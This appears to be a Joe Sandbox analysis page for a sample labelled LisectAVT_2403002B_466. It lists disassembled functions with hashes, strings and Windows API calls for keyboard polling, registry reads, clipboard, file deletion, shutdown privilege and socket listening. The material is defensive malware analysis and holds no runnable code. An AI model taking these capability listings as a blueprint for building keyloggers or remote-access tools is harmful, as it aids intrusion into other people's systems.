Opcode ID: 9e38cbe2de76ce3d1c71e62b50190aa49c9572f64c2f2d049828ea7956d2a30d
Instruction ID: 662f926821b176c04c59c533161a11810852919517f2390bfb00e9c860459b31
Opcode Fuzzy Hash: 9e38cbe2de76ce3d1c71e62b50190aa49c9572f64c2f2d049828ea7956d2a30d
Instruction Fuzzy Hash: 69616A71940209FFCF109FA5DD88AAEBBB9FF18704F149129E819B6291DB309A05CB60

Function 00E36843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

ANY), xrefs: 00E71717
UCP), xrefs: 00E71546
UTF), xrefs: 00E71533
BSR_ANYCRLF), xrefs: 00E71757
UTF16), xrefs: 00E71508
LIMIT_RECURSION=, xrefs: 00E71635
PJ, xrefs: 00E368B3
Oa, xrefs: 00E71888, 00E7192F, 00E719DD
BSR_UNICODE), xrefs: 00E71771
LF), xrefs: 00E716DD
NO_AUTO_POSSESS), xrefs: 00E71567
ANYCRLF), xrefs: 00E71734
CR), xrefs: 00E716C0
CRLF), xrefs: 00E716FA
LIMIT_MATCH=, xrefs: 00E715A9
NO_START_OPT), xrefs: 00E71588

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$PJ$UCP)$UTF)$UTF16)
API String ID: 0-1331342731
Opcode ID: 3ada86d0215ff3204aaab58dc97f1d0c25da79795dd1cc5b07f5b7ca87a07d15
Instruction ID: b1c977edb2a951f96abf33247e08276a7acd73d8e951c7ad31b691e8d497b13d
Opcode Fuzzy Hash: 3ada86d0215ff3204aaab58dc97f1d0c25da79795dd1cc5b07f5b7ca87a07d15
Instruction Fuzzy Hash: C4727071E003199BDB14DF69C8947EDBBB5EF88314F1491AAE949FB280E7709D81CB90

Function 00EA0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA0038,?,?), ref: 00EA10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA0737

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EA07D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EA086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EA0AAD
RegCloseKey.ADVAPI32(00000000), ref: 00EA0ABA

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 88ecabcbc50a095f08a03fafc0ccac95d6e9b687aa0431aa1d67cd2766bca50c
Instruction ID: 9e77bf8c9e317c174cfa22526d9f545350ba276fcb1e2f4a980c6eacfe600ce0
Opcode Fuzzy Hash: 88ecabcbc50a095f08a03fafc0ccac95d6e9b687aa0431aa1d67cd2766bca50c
Instruction Fuzzy Hash: 43E14C71604310AFCB14DF25C895E6ABBE4FF8D714F04996DF88AEB262DA30E905CB51

Function 00E80219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00E80241
GetAsyncKeyState.USER32(000000A0), ref: 00E802C2
GetKeyState.USER32(000000A0), ref: 00E802DD
GetAsyncKeyState.USER32(000000A1), ref: 00E802F7
GetKeyState.USER32(000000A1), ref: 00E8030C
GetAsyncKeyState.USER32(00000011), ref: 00E80324
GetKeyState.USER32(00000011), ref: 00E80336
GetAsyncKeyState.USER32(00000012), ref: 00E8034E
GetKeyState.USER32(00000012), ref: 00E80360
GetAsyncKeyState.USER32(0000005B), ref: 00E80378
GetKeyState.USER32(0000005B), ref: 00E8038A

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: d765e96cef5689ac11d6b098e5224ba6b55741e4fedf6b010e81b1c59ba0ba29
Instruction ID: a78acac507680384f806a6efb2e8482497d08faf69eb2e779b73fce6c3dc4f3e
Opcode Fuzzy Hash: d765e96cef5689ac11d6b098e5224ba6b55741e4fedf6b010e81b1c59ba0ba29
Instruction Fuzzy Hash: 14417724944BC96EFFB1ABA488083A5BFA06B16348F08509DD5CE761D3E7D45DCC87A2

Function 00E986D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

CoInitialize.OLE32 ref: 00E98718
CoUninitialize.OLE32 ref: 00E98723
CoCreateInstance.OLE32(?,00000000,00000017,00EB2BEC,?), ref: 00E98783
IIDFromString.OLE32(?,?), ref: 00E987F6
VariantInit.OLEAUT32(?), ref: 00E98890
VariantClear.OLEAUT32(?), ref: 00E988F1

Strings

Failed to create object, xrefs: 00E9878E, 00E98844
NULL Pointer assignment, xrefs: 00E987C8
Invalid parameter, xrefs: 00E9880F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: efbbc1b3a4581f0f78e06ed0d4ae28cb833a01e4f9036602fdafeedd34c66834
Instruction ID: be992249a8a9f9c33aee2a7085ac12dec7096f145f2e13265d9cbf0baa22b0b3
Opcode Fuzzy Hash: efbbc1b3a4581f0f78e06ed0d4ae28cb833a01e4f9036602fdafeedd34c66834
Instruction Fuzzy Hash: 0F61D2306083119FDB14DF64CA44B5AB7E4EF4A714F54581EF985BB2A1CB30ED48CBA2

Function 00E94458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00E9447F
EmptyClipboard.USER32 ref: 00E94485
GlobalAlloc.KERNEL32(00000002,?), ref: 00E9449A
CloseClipboard.USER32 ref: 00E94539

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 41e2f957324727a6b4a10c69c4776902ad3480927ce7cafc3c6cb4053a531b65
Instruction ID: 2d7c1c43a76e76d5728a8142e8bbed6365f3009a8adb0eb3483344ffdc665371
Opcode Fuzzy Hash: 41e2f957324727a6b4a10c69c4776902ad3480927ce7cafc3c6cb4053a531b65
Instruction Fuzzy Hash: FE21A3756006209FDB109FA1EC49F6D7BA8EF49715F10901AF946FB2B1DB30AC05CB94

Function 00E83A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E248A1,?,?,00E237C0,?), ref: 00E248CE

Part of subcall function 00E84CD3: GetFileAttributesW.KERNEL32(?,00E83947), ref: 00E84CD4

FindFirstFileW.KERNEL32(?,?), ref: 00E83ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E83B87
MoveFileW.KERNEL32(?,?), ref: 00E83B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E83BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E83BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E83BF5

Strings

\*.*, xrefs: 00E83A8A, 00E83A93, 00E83AA8

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 9c7a655ef5c47fcb2abf546d835205f53e9843f70b0a5c51ffc0c2564158a754
Instruction ID: f027368900c2be1d85f65c9dd7b77556e65cf271e5bbb4f1749622887f0f0bd8
Opcode Fuzzy Hash: 9c7a655ef5c47fcb2abf546d835205f53e9843f70b0a5c51ffc0c2564158a754
Instruction Fuzzy Hash: 22519E7180515D9ACF15FBA0DE929EDB7B8AF14304F2461AAE44A77091EF306F0DCBA0

Function 00E34140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00E344DB
VUUU, xrefs: 00E67B0C
ERCP, xrefs: 00E3421F
VUUU, xrefs: 00E34520
VUUU, xrefs: 00E344ED
Oa, xrefs: 00E34984, 00E68173

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
API String ID: 0-3486589167
Opcode ID: 08a002ca2504d89ff9ce5380f2853759aaa4dffb37883a6e29dc760c68e9d23f
Instruction ID: 1fdacb379af886b064078bf427a73987642c48d2034ab6490e6a4b826692ea87
Opcode Fuzzy Hash: 08a002ca2504d89ff9ce5380f2853759aaa4dffb37883a6e29dc760c68e9d23f
Instruction Fuzzy Hash: 56A29EB0E0421ACBDF24CF58D9447EDBBB1FB55358F14A5AAD855B7280D770AE81CB40

Function 00E8F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E8F6AB
Sleep.KERNEL32(0000000A), ref: 00E8F6DB
_wcscmp.LIBCMT ref: 00E8F6EF
_wcscmp.LIBCMT ref: 00E8F70A
FindNextFileW.KERNEL32(?,?), ref: 00E8F7A8
FindClose.KERNEL32(00000000), ref: 00E8F7BE

Strings

*.*, xrefs: 00E8F690

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 6a675094c7f9c07950dcb94bdc6dedd1e107f7e6d0cee2608096a8961c13b175
Instruction ID: df279d55751f471f0b4f03d34a48502a05a5793d788628199fab24ef2ff98ebe
Opcode Fuzzy Hash: 6a675094c7f9c07950dcb94bdc6dedd1e107f7e6d0cee2608096a8961c13b175
Instruction Fuzzy Hash: EF41907190021A9FDF10EFA4DC45AEEBBB4FF09314F145566E81CB21A0EB319E44CBA0

Function 00E358C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E35A05
_memmove.LIBCMT ref: 00E35A55
_memmove.LIBCMT ref: 00E35ABB

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 20e1c421af870c9334c3d5e37b1ea3879036672a1dd89fcee4dff16bf2684cf8
Instruction ID: c331d01a945c21891f37ea3e48218d569f65840519267d5d9a8ddd3c8e2ab001
Opcode Fuzzy Hash: 20e1c421af870c9334c3d5e37b1ea3879036672a1dd89fcee4dff16bf2684cf8
Instruction Fuzzy Hash: D6129971A00609DFDF04CFA5E985AEEB7F5FF48300F109569E44AB7290EB35AA15CB50

Function 00E35680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00E40FF6: std::exception::exception.LIBCMT ref: 00E4102C
Part of subcall function 00E40FF6: __CxxThrowException@8.LIBCMT ref: 00E41041

_memmove.LIBCMT ref: 00E7062F
_memmove.LIBCMT ref: 00E70744
_memmove.LIBCMT ref: 00E707EB

Strings

yZ, xrefs: 00E70881, 00E707FF

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID: yZ
API String ID: 1300846289-3798167742
Opcode ID: 103179d7863ceced11bb566ff8feef126e34b7479b017c15b498fbfd0150cd4c
Instruction ID: da34d5ee96efa7d310bcaa6c1445b1db0e67ed5626d519809fc6af5d303cf6a9
Opcode Fuzzy Hash: 103179d7863ceced11bb566ff8feef126e34b7479b017c15b498fbfd0150cd4c
Instruction Fuzzy Hash: 28029171A01205DFDF08DF64E9856AE7BF5EF44300F14906AE80AEB395EB31D954CB91

Function 00E8545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00E78CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E78D0D
Part of subcall function 00E78CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E78D3A
Part of subcall function 00E78CC3: GetLastError.KERNEL32 ref: 00E78D47

ExitWindowsEx.USER32(?,00000000), ref: 00E8549B

Strings

, xrefs: 00E85489
SeShutdownPrivilege, xrefs: 00E8546B
@, xrefs: 00E8548E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 4a8bd12940653e54b40a80e0f5f563ccdce254f889bd83ea488aba7f71e3d631
Instruction ID: 1e81d75800716c56c0d5b3261295ac4fb5b459c8866c9ca615be5b2f0b29837f
Opcode Fuzzy Hash: 4a8bd12940653e54b40a80e0f5f563ccdce254f889bd83ea488aba7f71e3d631
Instruction Fuzzy Hash: FF01FC33695B115EE72977B4DC4ABBA7258EB06752F242131FC2FF20D2DD605C844790

Function 00E33190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

Oa, xrefs: 00E33482

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __itow__swprintf
String ID: Oa
API String ID: 674341424-3945284152
Opcode ID: f220c162be688e40ba2235f8ac5ff23588dabd1f29fd2e7bb9f168cd981aaff0
Instruction ID: 9f2a58f222cebe2311a9143f99d3714a610a7ddca9f2ac90a4985be92e202fcd
Opcode Fuzzy Hash: f220c162be688e40ba2235f8ac5ff23588dabd1f29fd2e7bb9f168cd981aaff0
Instruction Fuzzy Hash: 0022BF716083119FC724DF24D895BAFBBE4BF84708F10691DF896A7291DB30EA44CB92

Function 00E96596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E965EF
WSAGetLastError.WSOCK32(00000000), ref: 00E965FE
bind.WSOCK32(00000000,?,00000010), ref: 00E9661A
listen.WSOCK32(00000000,00000005), ref: 00E96629
WSAGetLastError.WSOCK32(00000000), ref: 00E96643
closesocket.WSOCK32(00000000,00000000), ref: 00E96657

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: d650e4756620992becee112c9c20defd29d85e612eb259834c35364fc00ad02b
Instruction ID: c96d1f83ee33354dff6fe7c6316e7e90b140f3e779166991c3425132962f06ae
Opcode Fuzzy Hash: d650e4756620992becee112c9c20defd29d85e612eb259834c35364fc00ad02b
Instruction Fuzzy Hash: 1C21CE316002109FDF10EF64D846A6EB7E9EF49724F11915AF95AB73D2CB30AD05CB50

Function 00E21287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00E22612: GetWindowLongW.USER32(?,000000EB), ref: 00E22623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00E219FA
GetSysColor.USER32(0000000F), ref: 00E21A4E
SetBkColor.GDI32(?,00000000), ref: 00E21A61

Part of subcall function 00E21290: DefDlgProcW.USER32(?,00000020,?), ref: 00E212D8

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 6f04f20aff74e35ff03ea743632ec20f0a243af28f8e2abd2f2c1998ce04ed91
Instruction ID: 89e04ee7955302592331f78b2aa6247eadeacf904a1a336f4df82502fe28b13a
Opcode Fuzzy Hash: 6f04f20aff74e35ff03ea743632ec20f0a243af28f8e2abd2f2c1998ce04ed91
Instruction Fuzzy Hash: 57A19DB11014A4BED638AB297C45EFF35DCDBA638AB24354EF802F9191CA52DF0192B5

Function 00E96A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E980A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E980CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E96AB1
WSAGetLastError.WSOCK32(00000000), ref: 00E96ADA
bind.WSOCK32(00000000,?,00000010), ref: 00E96B13
WSAGetLastError.WSOCK32(00000000), ref: 00E96B20
closesocket.WSOCK32(00000000,00000000), ref: 00E96B34

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 45514650abe859e23d7908a3416c21baebb94cce273fb040ad6a8ca7923fc9df
Instruction ID: 766e9ada060e717ba3e4060b3faccc85df1cac3b67acdfec3a1195f7d45d485e
Opcode Fuzzy Hash: 45514650abe859e23d7908a3416c21baebb94cce273fb040ad6a8ca7923fc9df
Instruction Fuzzy Hash: 7341C675B00220AFEF10AF64EC86F6E77E5AB49714F049059F95ABB3D3DA705D008791

Function 00EA55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00EA564C
IsWindowEnabled.USER32 ref: 00EA565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00EA5667
IsIconic.USER32 ref: 00EA5675
IsZoomed.USER32 ref: 00EA5683

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: f510f2a51ff9f9497ecb210527fa56d88857f4f7a8141949ec628a7806d4cec8
Instruction ID: 6260a4ff105259f48c74ad66a9773a86a6b2f223fd4b2f0d89323fb89d0eb848
